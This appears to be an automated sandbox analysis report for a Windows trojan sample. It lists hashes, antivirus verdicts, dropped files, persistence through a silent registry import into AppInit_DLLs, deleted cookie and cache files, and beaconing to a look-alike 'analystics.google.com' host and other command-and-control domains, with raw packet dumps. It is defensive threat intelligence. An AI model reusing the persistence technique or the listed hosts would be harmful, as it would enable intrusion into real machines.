Analysis Date2014-11-22 14:31:56
MD5116c0fe5e3c575f24c0d027ac1def934
SHA1af5a28e2c369d028463f36af50241faaef3b1aa4

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: 17c859bc42287538328d2e694cad6d87 sha1: 1f689b7ec2a4f3e38b1ec9dd099c01c523d5b11f size: 128000
SectionDATA md5: c48e21be5e084518c3affd8a60fe2d25 sha1: b1ab3ed44ee49e9e652f3a62c372bb195847da30 size: 8192
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 4f072fbaab608635544cafc2c05d96fd sha1: 6805f6247cabe1f202d376f495e2aee4f3bf860a size: 1024
Section.reloc md5: 1deb610a085d47c2fe04b51b9291f03b sha1: 869a51a6c9d227c18fd8e1778c3c4259cb330ebd size: 6144
Section.rsrc md5: dcf99b5e5e3ef6dcec83d13c46a3042e sha1: 171205a5f5f894c49d68425f180e2a2d4119476d size: 3584
Timestamp1992-06-19 22:22:17
PEhash9a550d78c919926c336adb194894dd2f4d3e3f8c
IMPhash1d91d83dd2de8b3c36478c03754327dc
AV360 SafeGen:Variant.Kazy.408
AVAd-AwareGen:Variant.Kazy.408
AVAlwil (avast)Vundo-ACX [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumno_virus
AVAvira (antivir)TR/Kazy.408.17
AVBullGuardGen:Variant.Kazy.408
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebTrojan.SMSSend.2363
AVEmsisoftGen:Variant.Kazy.408
AVEset (nod32)Win32/Kryptik.ARBA
AVFortinetW32/Kryptik.WIE!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Variant.Kazy.408
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cidox
AVK7Trojan ( 0040f23c1 )
AVKasperskyHoax.Win32.ArchSMS.heur
AVMalwareBytesSpyware.Zeus
AVMcafeeno_virus
AVMicrosoft Security EssentialsTrojanDropper:Win32/Vundo.AA
AVMicroWorld (escan)Gen:Variant.Kazy.408
AVRisingno_virus
AVSophosTroj/Mdrop-ETG
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)Backdoor.Cidox

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\kynvywm.dll
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSdetoxist.com
Winsock DNSclickbeta.ru
Winsock DNS91.220.35.154
Winsock DNSveroconma.com
Winsock DNSterrans.su
Winsock DNSgetinball.com
Winsock DNSgeostepster.com
Winsock DNStheloamva.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdentagod.com
Winsock DNSdenareclick.com
Winsock DNSdebijonda.com
Winsock DNSfescheck.com
Winsock DNSliteworns.com
Winsock DNSgetintsu.com
Winsock DNSnshouse1.com
Winsock DNSnetrovad.com
Winsock DNSvengibit.com
Winsock DNStryangets.com
Winsock DNSvornedix.com
Winsock DNSinzavora.com
Winsock DNSgetavodes.com
Winsock DNSdegoog1etag.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\kynvywm.dll\\x00

Network Details:

DNSgeostepster.com
Type: A
208.73.211.244
DNSgeostepster.com
Type: A
208.73.211.250
DNSgeostepster.com
Type: A
208.73.210.211
DNSgeostepster.com
Type: A
208.73.211.167
DNSdetoxist.com
Type: A
141.8.225.80
DNSdebijonda.com
Type: A
141.8.225.80
DNSveroconma.com
Type: A
74.117.179.241
DNStheloamva.com
Type: A
141.8.225.80
DNSvornedix.com
Type: A
141.8.225.80
DNSdentagod.com
Type: A
141.8.225.80
DNSliteworns.com
Type: A
141.8.225.80
DNSvengibit.com
Type: A
141.8.225.80
DNStryangets.com
Type: A
141.8.225.80
DNSgetintsu.com
Type: A
141.8.225.80
DNSgetavodes.com
Type: A
141.8.225.80
DNStryatdns.com
Type: A
209.222.14.3
DNSfescheck.com
Type: A
209.222.14.3
DNSinzavora.com
Type: A
141.8.225.80
DNSdegoog1etag.com
Type: A
DNSgetinball.com
Type: A
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxv3Ll2Q1ePcjA
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxv3Ll2Q1ePcjA
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxv7EUtOo6xUZj
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxvwvvW7CMcEUq
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxvwvvW7CMcEUq
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxv+a49arcaDJz
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxv+a49arcaDJz
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxvwZ8mpBVEgCK
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxvwOfOYbpgJ/J
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxvwOfOYbpgJ/J
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxvwOfOYbpgJ/J
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxv1SgzdT2KXAQ
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxv+empcbja+xT
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxv2ZUXcAKSYlU
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxvwOfOYbpgJ/J
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2586&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+WrkSJYpwXxZLVGXQD8dCIfEqqCUsXxvwySc6TAy7Uk
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 208.73.211.244:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 74.117.179.241:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1041 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1042 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1043 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1044 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1045 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1046 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   58787633 4c6c3251 31655063 6a412048   Xxv3Ll2Q1ePcjA H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   58787633 4c6c3251 31655063 6a412048   Xxv3Ll2Q1ePcjA H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   58787637 4555744f 6f367855 5a6a2048   Xxv7EUtOo6xUZj H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   58787677 76765737 434d6345 55712048   XxvwvvW7CMcEUq H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   58787677 76765737 434d6345 55712048   XxvwvvW7CMcEUq H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   5878762b 61343961 72636144 4a7a2048   Xxv+a49arcaDJz H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   5878762b 61343961 72636144 4a7a2048   Xxv+a49arcaDJz H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   58787677 5a386d70 42564567 434b2048   XxvwZ8mpBVEgCK H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   58787677 4f664f59 6270674a 2f4a2048   XxvwOfOYbpgJ/J H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   58787677 4f664f59 6270674a 2f4a2048   XxvwOfOYbpgJ/J H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   58787677 4f664f59 6270674a 2f4a2048   XxvwOfOYbpgJ/J H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
